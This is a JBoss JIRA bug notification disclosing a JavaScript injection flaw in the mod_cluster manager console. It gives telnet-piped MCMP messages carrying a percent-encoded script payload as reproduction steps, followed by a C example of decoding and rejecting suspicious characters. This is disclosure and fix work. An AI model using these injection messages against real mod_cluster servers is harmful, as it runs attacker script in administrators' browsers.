[mod_cluster-issues] [JBoss JIRA] (MODCLUSTER-453) It is possible to inject JavaScript into mod_cluster manager console via MCMP messages

RH Bugzilla Integration (JIRA) issues at jboss.org
Tue Apr 12 03:40:00 EDT 2016


    [ https://issues.jboss.org/browse/MODCLUSTER-453?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13190246#comment-13190246 ] 

RH Bugzilla Integration commented on MODCLUSTER-453:
----------------------------------------------------

baranowb <bbaranow at redhat.com> changed the Status of [bug 1326179|https://bugzilla.redhat.com/show_bug.cgi?id=1326179] from NEW to MODIFIED

> It is possible to inject JavaScript into mod_cluster manager console via MCMP messages
> --------------------------------------------------------------------------------------
>
>                 Key: MODCLUSTER-453
>                 URL: https://issues.jboss.org/browse/MODCLUSTER-453
>             Project: mod_cluster
>          Issue Type: Bug
>          Components: Native (httpd modules)
>    Affects Versions: 1.2.6.Final, 1.2.9.Final, 1.2.11.Final, 1.3.1.Beta2
>            Reporter: Michal Karm Babacek
>            Assignee: Jean-Frederic Clere
>            Priority: Critical
>             Fix For: 1.3.2.Final, 1.2.12.Final
>
>         Attachments: MODCLUSTER-453_master-better_one.patch, MODCLUSTER-453_master-mbabacek.patch, MODCLUSTER-453_master-offensive_approach.patch, patch.new.best.patch, patch.new.txt, patch.txt
>
>
> This is a nasty one indeed :-)
> h3. Steps to reproduce
> * start Apache HTTP Server with mod_cluster
> * send these messages (provided your test instance listens on 127.0.0.1)
> {code}
> { echo "CONFIG / HTTP/1.1"; echo "Host: localhost.localdomain:6666"; echo "Content-Length: 95"; echo "User-Agent: Prdel"; echo ""; echo "JVMRoute=fake-1&Ho5t=127.0.0.1&Maxattempts=1&Port=8009&StickySessionForce=No&Type=ajp&ping=10"; sleep 1;} | telnet 127.0.0.1 6666
> { echo "ENABLE-APP / HTTP/1.1"; echo "Host: localhost.localdomain:6666"; echo "Content-Length: 102"; echo "User-Agent: ClusterListener%2F1.0"; echo ""; echo 'JVMRoute%3Dfake-1%26Alias%3Ddefault-host%26Context%3D%2FX%3Cscript%3Ealert(%27X%27)%3B%3C%2Fscript%3E'; sleep 1;} | telnet 127.0.0.1 6666
> {code}
> * Open http://localhost:6666/mod_cluster_manager and enjoy the JavaScript pop-up alert being executed.
> h3. Impact
>  * Anyone with access to the (hopefully only internal) network from which MCMP messages are allowed to come could send these messages and execute arbitrary JavaScript code.
> h3. Suggestion
> * Leverage {{apr_escape*}} to sanitize MCMP messages.
> h3. Proposed patch
> * [^patch.new.best.patch]: MCMP messages containing suspicious characters are discarded.



--
This message was sent by Atlassian JIRA
(v6.4.11#64026)
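
The proposed patch is described as discarding MCMP messages that contain suspicious characters. The C code below is an added example, not the attached patch or mod_cluster's own code; it shows why such a check has to run on the percent-decoded field value, since the Context value in the report contains no literal `<` or `'` on the wire. The function names, the 256-byte buffer and the rejected character set are assumptions of this example.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Percent-decode src into dst (cap >= 1). Returns -1 on a malformed escape,
 * an encoded NUL or overflow. Hypothetical helper, not mod_cluster code. */
int mcmp_decode(const char *src, char *dst, size_t cap)
{
    size_t n = 0;
    for (; *src; src++) {
        unsigned int c = (unsigned char)*src;
        if (c == '%') {
            if (!isxdigit((unsigned char)src[1]) || !isxdigit((unsigned char)src[2]))
                return -1;
            sscanf(src + 1, "%2x", &c);
            src += 2;
        }
        if (c == 0 || n + 1 >= cap)
            return -1;
        dst[n++] = (char)c;
    }
    dst[n] = '\0';
    return 0;
}

/* 1 if a decoded value holds HTML-active or control characters. The
 * character set is this example's assumption, not the one in the patch. */
int mcmp_is_suspicious(const char *v)
{
    for (; *v; v++)
        if (strchr("<>\"'&", *v) || iscntrl((unsigned char)*v))
            return 1;
    return 0;
}

/* 1 if an encoded field may be kept, 0 if the message should be discarded. */
int mcmp_field_ok(const char *encoded)
{
    char buf[256];
    return mcmp_decode(encoded, buf, sizeof buf) == 0 && !mcmp_is_suspicious(buf);
}

int main(void)
{
    /* Context value from the report (still encoded) and a constructed benign one. */
    const char *reported = "%2FX%3Cscript%3Ealert(%27X%27)%3B%3C%2Fscript%3E";
    printf("raw bytes flagged: %d\n", mcmp_is_suspicious(reported));
    printf("kept: reported=%d benign=%d\n", mcmp_field_ok(reported), mcmp_field_ok("%2Fmyapp"));
    return 0;
}
```

Discarding on input and entity-escaping on output (the `apr_escape*` suggestion in the report) are complementary: the first keeps the value out of the stored configuration, the second protects the manager page if a value slips through.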

